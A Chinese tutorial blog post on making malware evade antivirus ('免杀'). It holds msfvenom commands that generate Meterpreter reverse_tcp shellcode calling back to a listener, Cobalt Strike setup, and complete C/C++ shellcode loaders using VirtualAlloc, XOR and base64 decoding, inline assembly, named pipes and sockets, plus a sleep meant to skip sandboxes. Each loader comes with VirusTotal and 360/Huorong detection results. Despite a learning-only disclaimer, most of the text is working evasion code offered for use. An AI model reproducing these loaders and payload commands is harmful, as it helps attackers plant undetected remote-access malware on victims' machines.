当前位置: 首页 > news >正文

编写tcp服务器发送hex格式_恶意程序编写之免杀基础

    郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

前言

   踩着大佬们的脚步,用自己蹩脚的C++功底复现了师傅给出的一些免杀方案。后续将给出自己的两个免杀方案,复现大佬们的这几个方案用了3天时间,我真的是菜的可怜。

6b1292ae7773f46e517713f0f7736e51.png

生成ShellCode的方法

1、使用msfvenom生成的ShellCode

  • 参数说明

    -l, --list                 List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all    -p, --payload           要使用的有效载荷    -f, --format             输出格式,输出的语言类型    -e, --encoder           要使用的编码器    -a, --arch                 用于--payload和--encoders的体系结构    -o, --out                  保存到那个文件    -b, --bad-chars            避免使用那些字符    -n, --nopsled            提前给负荷(payload)设置一个长度为length的nopsled    -s, --space              产生有效负荷的最大长度    -i, --iterations          对负荷进行编码的次数    -c, --add-code             指定一个详细win32 shellcode文件给include    -x, --template             指定一个自定义可执行的文件作为一个模板(template)    -k, --keep                       保留--template生成的模板行为并且把负荷作为一个新的线程注入    -v, --var-name            指定一个自定义变量名作为确切的输出格式    -t, --timeout            从STDIN读取有效负载时要等待的秒数(默认为30,禁用为0)
  • 生成ShellCode命令

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.183.138 lport=4444   -f c
  • -f 能够生产如下格式的代码

bashccsharpdwdwordhexjavajs_bejs_lenumperlplpowershellps1pypythonrawrbrubyshvbapplicationvbscript
  • Msf中监听

use multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.183.138set LPORT 4444set EnableStageEncoding true

2、使用Cobaltstrike生成的ShellCode

客户端运行

javaw -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

服务端运行

./teamserver you_ip you_passwd
  • 使用C++编译器生成ShellCode

后面会出个shellcode生成器的文章

使用C++进行编译免杀

申请动态内存加载

申请内存的方式有很多种常见的几种方式如下

HeapAllocmallocVirtualAllocnewLocalAlloc

PlanA

#include #include #include #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口unsigned char buf[] = "shellcode";void main(){    LPVOID Memory;    Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    memcpy(Memory, buf, sizeof(buf));    ((void(*)())Memory)();}

运行效果

60960ee521e7991210b19c36b49922ff.png

VT免杀效果

d2c5f4ff1fde3434d4887d39c999a5f6.png

火绒报毒,360没反应

837b96acc82ca761c4113ad8b0aa0865.png

PlanB

#include #include typedef void (_stdcall *CODE)();#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")unsigned char shellcode[] ="shellcode";void main(){    PVOID p = NULL;    p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    if (p == NULL)    {        return;    }    memcpy(p, shellcode, sizeof(shellcode));      CODE code = (CODE)p;  code();}

VT免杀效果

62dfbe015d1ae48461fb47191286bdad.png

360和火绒都能查杀到

596eb492c7734e66192d296c42f12464.png

PlanC

A和B计划都是直接将代码执行,我们尝试先对shellcode进行异或加密然后在代码中解密

倾旋大佬的代码

import sysfrom argparse import ArgumentParser, FileTypedef process_bin(num, src_fp, dst_fp, dst_raw):    shellcode = ''    shellcode_size = 0    shellcode_raw = b''    try:        while True:            code = src_fp.read(1)            if not code:                break            base10 = ord(code) ^ num            base10_str = chr(base10)            shellcode_raw += base10_str.encode()            code_hex = hex(base10)          code_hex = code_hex.replace('0x','')            if(len(code_hex) == 1):              code_hex = '0' + code_hex            shellcode += '\\x' + code_hex          shellcode_size += 1        src_fp.close()      dst_raw.write(shellcode_raw)        dst_raw.close()      dst_fp.write(shellcode)        dst_fp.close()      return shellcode_size    except Exception as e:      sys.stderr.writelines(str(e))def main():    parser = ArgumentParser(prog='Shellcode X', description='[XOR The Cobaltstrike PAYLOAD.BINs] \t > Author: rvn0xsy@gmail.com')    parser.add_argument('-v','--version',nargs='?')    parser.add_argument('-s','--src',help=u'source bin file',type=FileType('rb'), required=True)    parser.add_argument('-d','--dst',help=u'destination shellcode file',type=FileType('w+'),required=True)    parser.add_argument('-n','--num',help=u'Confused number',type=int, default=90)    parser.add_argument('-r','--raw',help=u'output bin file', type=FileType('wb'), required=True)    args = parser.parse_args()    shellcode_size = process_bin(args.num, args.src, args.dst, args.raw)    sys.stdout.writelines("[+]Shellcode Size : {} \n".format(shellcode_size))  if __name__ == "__main__":  main()

先用msf生成bin文件,然后再用运行

python .\xor.py -s .\payload.bin -d payload.c -n 10 -r 123.txt

b80c7707a2469799563323e249f80ff4.png

生成好的payload.c文件

bd41c27bdc9fde5891230c73ddd1b040.png

这边用倾旋大佬的思路:在申请内存页时,一定要把控好属性,可以在Shellcode读入时,申请一个普通的可读写的内存页,然后再通过VirtualProtect改变它的属性 -> 可执行。

#微软的文档https://docs.microsoft.com/zh-cn/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc

具体代码

#include // 入口函数int wmain(int argc,TCHAR * argv[]){    int shellcode_size = 0; // shellcode长度    DWORD dwThreadId; // 线程ID    HANDLE hThread; // 线程句柄    DWORD dwOldProtect; // 内存页属性/* length: 800 bytes */unsigned char buf[] = "shellcode";// 获取shellcode大小shellcode_size = sizeof(buf);/* 增加异或代码 */for(int i = 0;i    buf[i] ^= 10;}/*VirtualAlloc(    NULL, // 基址  800,  // 大小    MEM_COMMIT, // 内存页状态    PAGE_EXECUTE_READWRITE // 可读可写可执行    );*/char * shellcode = (char *)VirtualAlloc(  NULL,    shellcode_size,    MEM_COMMIT,    PAGE_READWRITE // 只申请可读可写    //原来的属性是PAGE_EXECUTE_READWRITE    );    // 将shellcode复制到可读可写的内存页中CopyMemory(shellcode,buf,shellcode_size);// 这里开始更改它的属性为可执行VirtualProtect(shellcode,shellcode_size,PAGE_EXECUTE,&dwOldProtect);// 等待几秒,兴许可以跳过某些沙盒呢?Sleep(2000);hThread = CreateThread(    NULL, // 安全描述符    NULL, // 栈的大小    (LPTHREAD_START_ROUTINE)shellcode, // 函数    NULL, // 参数    NULL, // 线程标志    &dwThreadId // 线程ID    );WaitForSingleObject(hThread,INFINITE); // 一直等待线程执行结束    return 0;}

TV免杀效果

b3432660cc45fc8606a69adf84dbcf0d.png

360和火绒免杀效果,两个杀软都检测不出来

e6aeaff23cdb8dbb3a4eb27cc6aa75c3.png

嵌入式汇编执行
  #include   #include   #pragma comment(linker, "/section:.data,RWE")  unsigned char shellcode[] ="shellcode";    void main(){          __asm      {                    mov eax, offset shellcode          jmp eax        }  }  

依旧360没报毒,火绒报毒

d6bac1a9f4fac3ebc6291030b3ddc894.png

TV报毒依旧不理想

26b8454d4e1dacb4ed294f1f6d4efd33.png

强制类型转换成函数指针

 这种方法编译容易导致程序不能运行,需要用vs6.0进行编译,免杀效果也是目前最差的,编译测试的时候会导致程序崩溃

#include #include #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")unsigned char shellcode[] ="shellcode";void main(){  ((void(WINAPI*)(void))&shellcode)();}

汇编花指令

这边的花指令可以直接加上一些像nop之类的没用的代码暂停什么的,还是可以提升绕过沙盒的几率

#include #include #pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";void main(){  __asm  {    mov eax, offset shellcode      _emit 0xFF        _emit 0xE0  }}

 TV免杀效果和直接汇报效果差不多

4042b9ac784965be4adff3005f233e9f.png

 杀软效果依旧是360不报毒,火绒报毒了

ab59aa68eedd0f45fcc812e684eb5960.png

利用管道来执行

这两种方法的shellcode需要使用xor脚本进行异或后再能使用不然会报错,如果不想生成可以删除这段代码即可

for(DWORD i = 0;i< dwLen; i++){  Sleep(50);  _InterlockedXor8(pszShellcode+i,10);}

单进程方式

#include #include #include #define BUFF_SIZE 1024char buf[] = "shellcode";PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");BOOL RecvShellcode(VOID){    HANDLE hPipeClient;    DWORD dwWritten;    DWORD dwShellcodeSize = sizeof(buf);    // 等待管道可用    WaitNamedPipe(ptsPipeName,NMPWAIT_WAIT_FOREVER);    // 连接管道    hPipeClient = CreateFile(ptsPipeName,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING ,FILE_ATTRIBUTE_NORMAL,NULL);    if(hPipeClient == INVALID_HANDLE_VALUE){        printf("[+]Can't Open Pipe , Error : %d \n",GetLastError());        return FALSE;    }    WriteFile(hPipeClient,buf,dwShellcodeSize,&dwWritten,NULL);    if(dwWritten == dwShellcodeSize){        CloseHandle(hPipeClient);        printf("[+]Send Success ! Shellcode : %d Bytes\n",dwShellcodeSize);        return TRUE;    }    CloseHandle(hPipeClient);    return FALSE;}int wmain(int argc, TCHAR * argv[]){    HANDLE hPipe;    DWORD dwError;    CHAR szBuffer[BUFF_SIZE];    DWORD dwLen;    PCHAR pszShellcode = NULL;    DWORD dwOldProtect; // 内存页属性    HANDLE hThread;    DWORD dwThreadId;    // 参考:https://docs.microsoft.com/zh-cn/windows/win32/api/winbase/nf-winbase-createnamedpipea    hPipe = CreateNamedPipe(        ptsPipeName,        PIPE_ACCESS_INBOUND,        PIPE_TYPE_BYTE| PIPE_WAIT,        PIPE_UNLIMITED_INSTANCES,        BUFF_SIZE,        BUFF_SIZE,        0,        NULL);    if(hPipe == INVALID_HANDLE_VALUE){        dwError = GetLastError();        printf("[-]Create Pipe Error : %d \n",dwError);        return dwError;    }    CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)RecvShellcode,NULL,NULL,NULL);    if(ConnectNamedPipe(hPipe,NULL) > 0){        printf("[+]Client Connected...\n");        ReadFile(hPipe,szBuffer,BUFF_SIZE,&dwLen,NULL);        printf("[+]Get DATA Length : %d \n",dwLen);        // 申请内存页        pszShellcode = (PCHAR)VirtualAlloc(NULL,dwLen,MEM_COMMIT,PAGE_READWRITE);        // 拷贝内存        CopyMemory(pszShellcode,szBuffer,dwLen);        for(DWORD i = 0;i< dwLen; i++){            Sleep(50);            _InterlockedXor8(pszShellcode+i,10);        }        // 这里开始更改它的属性为可执行        VirtualProtect(pszShellcode,dwLen,PAGE_EXECUTE,&dwOldProtect);        // 执行Shellcode        hThread = CreateThread(            NULL, // 安全描述符            NULL, // 栈的大小            (LPTHREAD_START_ROUTINE)pszShellcode, // 函数            NULL, // 参数            NULL, // 线程标志            &dwThreadId // 线程ID        );        WaitForSingleObject(hThread,INFINITE);    }    return 0;}

VT效果

0e373944d15034784394409324abd356.png

360和火绒都没报毒

78e59505487ef8fda05b0969da8a029a.png

多进程方式

PipServer进程

#include #include #include #define BUFF_SIZE 1024PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");int wmain(int argc, TCHAR * argv[]){    HANDLE hPipe;    DWORD dwError;    CHAR szBuffer[BUFF_SIZE];    DWORD dwLen;    PCHAR pszShellcode = NULL;    DWORD dwOldProtect; // 内存页属性    HANDLE hThread;    DWORD dwThreadId;    // 参考:https://docs.microsoft.com/zh-cn/windows/win32/api/winbase/nf-winbase-createnamedpipea    hPipe = CreateNamedPipe(        ptsPipeName,        PIPE_ACCESS_INBOUND,        PIPE_TYPE_BYTE| PIPE_WAIT,        PIPE_UNLIMITED_INSTANCES,        BUFF_SIZE,        BUFF_SIZE,        0,        NULL);    if(hPipe == INVALID_HANDLE_VALUE){        dwError = GetLastError();        printf("[-]Create Pipe Error : %d \n",dwError);        return dwError;    }    if(ConnectNamedPipe(hPipe,NULL) > 0){        printf("[+]Client Connected...\n");        ReadFile(hPipe,szBuffer,BUFF_SIZE,&dwLen,NULL);        printf("[+]Get DATA Length : %d \n",dwLen);        // 申请内存页        pszShellcode = (PCHAR)VirtualAlloc(NULL,dwLen,MEM_COMMIT,PAGE_READWRITE);        // 拷贝内存        CopyMemory(pszShellcode,szBuffer,dwLen);        for(DWORD i = 0;i< dwLen; i++){            Sleep(50);            _InterlockedXor8(pszShellcode+i,10);        }        // 这里开始更改它的属性为可执行        VirtualProtect(pszShellcode,dwLen,PAGE_EXECUTE,&dwOldProtect);        // 执行Shellcode        hThread = CreateThread(            NULL, // 安全描述符            NULL, // 栈的大小            (LPTHREAD_START_ROUTINE)pszShellcode, // 函数            NULL, // 参数            NULL, // 线程标志            &dwThreadId // 线程ID        );        WaitForSingleObject(hThread,INFINITE);    }    return 0;}

PipClient进程

#include #include #include #define BUFF_SIZE 1024char buf[] = "shellcode";PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");BOOL RecvShellcode(VOID){    HANDLE hPipeClient;    DWORD dwWritten;    DWORD dwShellcodeSize = sizeof(buf);    // 等待管道可用    WaitNamedPipe(ptsPipeName,NMPWAIT_WAIT_FOREVER);    // 连接管道    hPipeClient = CreateFile(ptsPipeName,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING ,FILE_ATTRIBUTE_NORMAL,NULL);    if(hPipeClient == INVALID_HANDLE_VALUE){        printf("[+]Can't Open Pipe , Error : %d \n",GetLastError());        return FALSE;    }    WriteFile(hPipeClient,buf,dwShellcodeSize,&dwWritten,NULL);    if(dwWritten == dwShellcodeSize){        CloseHandle(hPipeClient);        printf("[+]Send Success ! Shellcode : %d Bytes\n",dwShellcodeSize);        return TRUE;    }    CloseHandle(hPipeClient);    return FALSE;}int wmain(int argc, TCHAR * argv[]){    RecvShellcode();    return 0;}

VT免杀效果

5233a025cf2eaa9db8c1c954b00f1375.png

8c815550e2049cd3b5a2d22335809699.png

360和火绒都免杀

0f08db09b810c9c90da11516c7f41ae7.png

网络套接字式

shellcode需要使用xor脚本进行异或后再能使用不然会报错,如果不想生成可以删除这段代码即可

for(DWORD i = 0;i< dwCodeLen; i++){_InterlockedXor8(pszShellcode+i,10);}

服务端

#include #include #include #include #pragma comment(lib,"ws2_32.lib")BOOL RunCode(CHAR * code,DWORD dwCodeLen){    HANDLE hThread;    DWORD dwOldProtect;    DWORD dwThreadId;    PCHAR pszShellcode = (PCHAR)VirtualAlloc(NULL,dwCodeLen,MEM_COMMIT,PAGE_READWRITE);    CopyMemory(pszShellcode,code,dwCodeLen);    for(DWORD i = 0;i< dwCodeLen; i++){            _InterlockedXor8(pszShellcode+i,10);    }    // 这里开始更改它的属性为可执行        VirtualProtect(pszShellcode,dwCodeLen,PAGE_EXECUTE,&dwOldProtect);        // 执行Shellcode        hThread = CreateThread(            NULL, // 安全描述符            NULL, // 栈的大小            (LPTHREAD_START_ROUTINE)pszShellcode, // 函数            NULL, // 参数            NULL, // 线程标志            &dwThreadId // 线程ID        );        WaitForSingleObject(hThread,INFINITE);        return TRUE;}int wmain(int argc, TCHAR argv[]){    CHAR buf[801];    DWORD dwError;    WORD sockVersion = MAKEWORD(2, 2);    WSADATA wsaData;    SOCKET socks;    SOCKET sClient;    struct sockaddr_in s_client;    INT nAddrLen = sizeof(s_client);    SHORT sListenPort = 8888;    struct sockaddr_in sin;    if (WSAStartup(sockVersion, &wsaData) != 0)    {        dwError = GetLastError();        printf("[*]WSAStarup Error : %d \n",dwError);        return dwError;    }    socks = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);    if (socks == INVALID_SOCKET)    {        dwError = GetLastError();        printf("[*]Socket Error : %d \n",dwError);        return dwError;    }    sin.sin_family = AF_INET;    sin.sin_port = htons(sListenPort);    sin.sin_addr.S_un.S_addr = INADDR_ANY;    if(bind(socks,(struct sockaddr *)&sin,sizeof(sin)) == SOCKET_ERROR )    {        dwError = GetLastError();        printf("[*]Bind Error : %d \n",dwError);        return dwError;    }    if (listen(socks, 5) == SOCKET_ERROR)    {        dwError = GetLastError();        printf("[*]Listen  Error : %d \n",dwError);        return dwError;    }    sClient = accept(socks, (SOCKADDR *)&s_client, &nAddrLen);    int ret = recv(sClient,buf,sizeof(buf),0);    if (ret > 0)    {        printf("[+]Recv %d-Bytes \n",ret);        closesocket(sClient);        closesocket(socks);    }    WSACleanup();    RunCode(buf,sizeof(buf));    return 0;}

客户端

#include #include #include #include #pragma comment(lib,"ws2_32.lib")char buf[] = "shellcode";int wmain(int argc, TCHAR argv[]){    DWORD dwError;    WORD sockVersion = MAKEWORD(2, 2);    WSADATA wsaData;    SOCKET socks;    SHORT sListenPort = 8888;    struct sockaddr_in sin;    if (WSAStartup(sockVersion, &wsaData) != 0)    {        dwError = GetLastError();        printf("[*]WSAStarup Error : %d \n",dwError);        return dwError;    }    socks = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);    if (socks == INVALID_SOCKET)    {        dwError = GetLastError();        printf("[*]Socket Error : %d \n",dwError);        return dwError;    }    sin.sin_family = AF_INET;    sin.sin_port = htons(sListenPort);    sin.sin_addr.S_un.S_addr = inet_addr("192.168.170.1");    if(connect(socks,(struct sockaddr *)&sin,sizeof(sin)) == SOCKET_ERROR )    {        dwError = GetLastError();        printf("[*]Bind Error : %d \n",dwError);        return dwError;    }    int ret = send(socks,buf,sizeof(buf),0);    if (ret > 0)    {        printf("[+]Send %d-Bytes \n",ret);        closesocket(socks);    }    WSACleanup();    return 0;}

TV免杀

cdbd4128e741afdfc12d16499b917167.png

74b24166a0d2125a4da2fd85da8a3e45.png

360和火绒都无法检测出来

6a4fae39a4adb0e0ba527e7b26a868b8.png

Base64加密法

Base6464.h

#ifndef base64_h#define base64_h#include #if __cplusplusextern "C" {#endif    int base64_encode(const char *indata, int inlen, char *outdata, int *outlen);    int base64_decode(const char *indata, int inlen, char *outdata);#if __cplusplus}#endif#endif /* base64_h */

Base64-cpp

/***  转解码过程*  3 * 8 = 4 * 6; 3字节占24位, 4*6=24*  先将要编码的转成对应的ASCII值*  如编码: s 1 3*  对应ASCII值为: 115 49 51*  对应二进制为: 01110011 00110001 00110011*  将其6个分组分4组: 011100 110011 000100 110011*  而计算机是以8bit存储, 所以在每组的高位补两个0如下:*  00011100 00110011 00000100 00110011对应:28 51 4 51*  查找base64 转换表 对应 c z E z**  解码*  c z E z*  对应ASCII值为 99 122 69 122*  对应表base64_suffix_map的值为 28 51 4 51*  对应二进制值为 00011100 00110011 00000100 00110011*  依次去除每组的前两位, 再拼接成3字节*  即: 01110011 00110001 00110011*  对应的就是s 1 3*/#include "base64.h"#include #include // base64 转换表, 共64个static const char base64_alphabet[] = {    'A', 'B', 'C', 'D', 'E', 'F', 'G',    'H', 'I', 'J', 'K', 'L', 'M', 'N',    'O', 'P', 'Q', 'R', 'S', 'T',    'U', 'V', 'W', 'X', 'Y', 'Z',    'a', 'b', 'c', 'd', 'e', 'f', 'g',    'h', 'i', 'j', 'k', 'l', 'm', 'n',    'o', 'p', 'q', 'r', 's', 't',    'u', 'v', 'w', 'x', 'y', 'z',    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',    '+', '/' };// 解码时使用static const unsigned char base64_suffix_map[256] = {    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 253, 255,    255, 253, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 253, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255,  62, 255, 255, 255,  63,    52,  53,  54,  55,  56,  57,  58,  59,  60,  61, 255, 255,    255, 254, 255, 255, 255,   0,   1,   2,   3,   4,   5,   6,    7,   8,   9,  10,  11,  12,  13,  14,  15,  16,  17,  18,    19,  20,  21,  22,  23,  24,  25, 255, 255, 255, 255, 255,    255,  26,  27,  28,  29,  30,  31,  32,  33,  34,  35,  36,    37,  38,  39,  40,  41,  42,  43,  44,  45,  46,  47,  48,    49,  50,  51, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,    255, 255, 255, 255 };static char cmove_bits(unsigned char src, unsigned lnum, unsigned rnum) {    src <<= lnum; // src = src << lnum;    src >>= rnum; // src = src >> rnum;    return src;}int base64_encode(const char *indata, int inlen, char *outdata, int *outlen) {    int ret = 0; // return value    if (indata == NULL || inlen == 0) {        return ret = -1;    }    int in_len = 0; // 源字符串长度, 如果in_len不是3的倍数, 那么需要补成3的倍数    int pad_num = 0; // 需要补齐的字符个数, 这样只有2, 1, 0(0的话不需要拼接, )    if (inlen % 3 != 0) {        pad_num = 3 - inlen % 3;    }    in_len = inlen + pad_num; // 拼接后的长度, 实际编码需要的长度(3的倍数)    int out_len = in_len * 8 / 6; // 编码后的长度    char *p = outdata; // 定义指针指向传出data的首地址                       //编码, 长度为调整后的长度, 3字节一组    for (int i = 0; i < in_len; i += 3) {        int value = *indata >> 2; // 将indata第一个字符向右移动2bit(丢弃2bit)        char c = base64_alphabet[value]; // 对应base64转换表的字符        *p = c; // 将对应字符(编码后字符)赋值给outdata第一字节                //处理最后一组(最后3字节)的数据        if (i == inlen + pad_num - 3 && pad_num != 0) {            if (pad_num == 1) {                *(p + 1) = base64_alphabet[(int)(cmove_bits(*indata, 6, 2) + cmove_bits(*(indata + 1), 0, 4))];                *(p + 2) = base64_alphabet[(int)cmove_bits(*(indata + 1), 4, 2)];                *(p + 3) = '=';            }            else if (pad_num == 2) { // 编码后的数据要补两个 '='                *(p + 1) = base64_alphabet[(int)cmove_bits(*indata, 6, 2)];                *(p + 2) = '=';                *(p + 3) = '=';            }        }        else { // 处理正常的3字节的数据            *(p + 1) = base64_alphabet[cmove_bits(*indata, 6, 2) + cmove_bits(*(indata + 1), 0, 4)];            *(p + 2) = base64_alphabet[cmove_bits(*(indata + 1), 4, 2) + cmove_bits(*(indata + 2), 0, 6)];            *(p + 3) = base64_alphabet[*(indata + 2) & 0x3f];        }        p += 4;        indata += 3;    }    if (outlen != NULL) {        *outlen = out_len;    }    return ret;}int base64_decode(const char *indata, int inlen, char *outdata) {    int ret = 0;    if (indata == NULL || inlen <= 0 || outdata == NULL ) {        return ret = -1;    }    if (inlen % 4 != 0) { // 需要解码的数据不是4字节倍数        return ret = -2;    }    int t = 0, x = 0, y = 0, i = 0;    unsigned char c = 0;    int g = 3;    while (indata[x] != 0) {        // 需要解码的数据对应的ASCII值对应base64_suffix_map的值        c = base64_suffix_map[indata[x++]];        if (c == 255) return -1;// 对应的值不在转码表中        if (c == 253) continue;// 对应的值是换行或者回车        if (c == 254) { c = 0; g--; }// 对应的值是'='        t = (t << 6) | c; // 将其依次放入一个int型中占3字节        if (++y == 4) {            outdata[i++] = (unsigned char)((t >> 16) & 0xff);            if (g > 1) outdata[i++] = (unsigned char)((t >> 8) & 0xff);            if (g > 2) outdata[i++] = (unsigned char)(t & 0xff);            y = t = 0;        }    }    return ret;}

Shell.c

#include #include #include #include "Base64.h"char buf[] ="shellcode";int main(int argc, const char* argv[]) {    char str3[1000] = { 0 };    base64_decode(buf, (int)strlen(buf), str3);    LPVOID Memory;    Memory = VirtualAlloc(NULL, sizeof(str3), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    memcpy(Memory, str3, sizeof(str3));    ((void(*)())Memory)();    return 0;}

用msf进行Base64加密

msfvenom -p  windows/meterpreter/reverse_tcp --encrypt base64  lhost=192.168.183.138 lport=4444  -f c > shell.c

然后把代码放到里面buf里面

TV查杀

a174387244f1fc564551d73589808cb2.png

依旧还是360查杀不了火绒报毒了

fc6f5e3722ff420012d15805d941c121.png

使用C++进行编译加载器进行免杀

使用shellcode launcher

项目地址如下

https://github.com/clinicallyinane/shellcode_launcher

生成raw的shellcode

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=127.0.0.1 lport=3333  -f raw -o shellcode.raw

在目标上运行

shellcode_launcher.exe -i shellcode.raw

火绒和360都不报毒

83f1bcac60d206f1ba2d81aa760531b9.png

TV上免杀效果

47ce1d9e547ce179d70592f795b6b098.png

使用shellcode launcher

项目地址如下

https://github.com/DimopoulosElias/SimpleShellcodeInjector

生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.183.138 LPORT=4444 -f c -o msf.txt

然后执行如下命令

cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

846a35dab928bdedccef8cb50993d44d.png

接着编译项目,然后在目标机器上执行,都可以绕过360和火绒

054d90eb5ac01f5fdad51b018bd4fff0.png

TV免杀效果目前是最好的了

9e48550c372d3d267c201366927670fe.png

感谢师傅们无私的贡献

https://payloads.online/archivers/2019-11-10/2https://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.htmlhttps://mp.weixin.qq.com/s/LftwV4bpuikDklIjuRw2L

757b45d46444e5ef036eced5bce5af51.png

相关文章:

  • webgis从基础到开发实践_WebGIS开发进阶练手题(二)
  • idea 启动vue 一会自己停了_这 几个 IDEA,调试的骚操作,用了都说爽!
  • java 桌面应用程序_针对初学Java的小伙伴,入门时应该了解的Java基础知识
  • python面向对象思路_Python基础之面向对象的软件开发思路
  • python主要应用于云计算的哪些方面_python在云计算的应用领域
  • python小程序_如何使用 Python 开发微信小程序
  • 华为平板wps语音朗读_年轻人智慧生活:荣耀笔记本、平板V6,智慧屏X1等多款新品再升级...
  • python复制文件夹所有文件到另外目录_如何使用Python将文件的整个目录复制到现有目录中?...
  • python输入多个数字 找出只出现一个的数字_【算法14】找出数组中两个只出现一次的数字...
  • python随机抽人小程序_python抽人程序初试
  • lodop打印不显示页码_教你9招,一次性解决Excel表格打印问题!
  • 原型和原型链的理解_理解Javascript的原型和原型链
  • 一个事务中 可以查询自己未提交的数据吗_来谈谈MySQL事务及事务引发的问题
  • python填写表单并提交_form表单提交方式
  • rar解压密码7秒破_30分钟,天猫成交额突破3723亿,京东9分钟破2000亿!姐妹们,你贡献了多少?...
  • Apache Zeppelin在Apache Trafodion上的可视化
  • iOS编译提示和导航提示
  • vuex 笔记整理
  • Vue实战(四)登录/注册页的实现
  • 翻译--Thinking in React
  • 关于for循环的简单归纳
  • 理解在java “”i=i++;”所发生的事情
  • 实战:基于Spring Boot快速开发RESTful风格API接口
  • 用 vue 组件自定义 v-model, 实现一个 Tab 组件。
  • HanLP分词命名实体提取详解
  • JavaScript 新语法详解:Class 的私有属性与私有方法 ...
  • ​2020 年大前端技术趋势解读
  • #HarmonyOS:基础语法
  • #我与Java虚拟机的故事#连载01:人在JVM,身不由己
  • (Redis使用系列) SpringBoot 中对应2.0.x版本的Redis配置 一
  • (二)springcloud实战之config配置中心
  • (附源码)ssm教师工作量核算统计系统 毕业设计 162307
  • (简单) HDU 2612 Find a way,BFS。
  • (深度全面解析)ChatGPT的重大更新给创业者带来了哪些红利机会
  • (一)eclipse Dynamic web project 工程目录以及文件路径问题
  • *2 echo、printf、mkdir命令的应用
  • ../depcomp: line 571: exec: g++: not found
  • ./configure、make、make install 命令
  • .NET Core WebAPI中使用Log4net 日志级别分类并记录到数据库
  • .NetCore Flurl.Http 升级到4.0后 https 无法建立SSL连接
  • .NET国产化改造探索(三)、银河麒麟安装.NET 8环境
  • .NET简谈互操作(五:基础知识之Dynamic平台调用)
  • @ConditionalOnProperty注解使用说明
  • [1127]图形打印 sdutOJ
  • [BZOJ4554][TJOI2016HEOI2016]游戏(匈牙利)
  • [C#]C# OpenVINO部署yolov8图像分类模型
  • [delphi]保证程序只运行一个实例
  • [IDF]摩斯密码
  • [IE 技巧] 显示/隐藏IE 的菜单/工具栏
  • [IE6 only]关于Flash/Flex,返回数据产生流错误Error #2032的解决方式
  • [IE编程] 打开/关闭IE8的光标浏览模式(Caret Browsing)
  • [IMX6DL] CPU频率调节模式以及降频方法
  • [iOS]把16进制(#871f78)颜色转换UIColor
  • [JS]变量
  • [macOS] Mojave10.14 夜神安卓模拟器启动问题